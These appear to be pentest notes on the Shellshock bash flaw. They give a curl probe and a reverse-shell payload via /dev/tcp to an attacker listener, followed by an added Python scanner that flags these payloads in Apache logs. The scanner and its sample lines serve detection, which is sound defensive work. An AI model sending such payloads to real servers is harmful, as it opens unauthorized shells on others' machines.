- This CVE (Shellshock) allows us to inject commands through the `/cgi-bin/test.cgi` script.
- Example command:
curl -H "User-agent: () { :;}; echo; echo vulnerable" http://IP_HOST/cgi-bin/test.cgi
- Get a reverse shell:
# On your machine start a listener
nc -nlvp PORT
# Then send a request for the shell
curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/IP_ATTACK/PORT 0>&1" http://IP_HOST/cgi-bin/test.cgi
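
Added example (not part of the original notes): a scan a defender can run over a web server access log to spot the requests shown above. It flags the `() {` function-definition prefix in the request line, Referer or User-Agent; the log lines, addresses and port are constructed, and the Apache combined log format is an assumption.

```python
import re

# Assumed format: Apache "combined" access log
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Vulnerable bash imports an environment value as a function when it starts
# with "() {". CGI copies request headers into the environment, so that
# prefix in a logged header is the Shellshock signal.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')
# A /dev/tcp or /dev/udp redirect after the prefix means a connect-back attempt.
CALLBACK = re.compile(r'/dev/(?:tcp|udp)/')

# Constructed sample lines (documentation-range addresses, made-up port).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 11 "-" "() { :;}; echo; echo vulnerable"',
    '198.51.100.7 - - [12/Mar/2024:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '500 0 "-" "() { :;}; /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"',
    '192.0.2.15 - - [12/Mar/2024:10:04:11 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def scan(lines):
    """Return one finding per log field that carries the function-definition prefix."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # not in the assumed format
        host, request, status, referer, agent = match.groups()
        parts = request.split()
        path = parts[1] if len(parts) > 1 else request
        for field, value in (("request", request), ("referer", referer), ("user-agent", agent)):
            if FUNC_DEF.search(value):
                kind = "callback" if CALLBACK.search(value) else "probe"
                findings.append({"line": number, "host": host, "path": path,
                                 "status": status, "field": field, "kind": kind})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit shows an attempt, not a compromise; whether the host was affected depends on the bash version behind the CGI script.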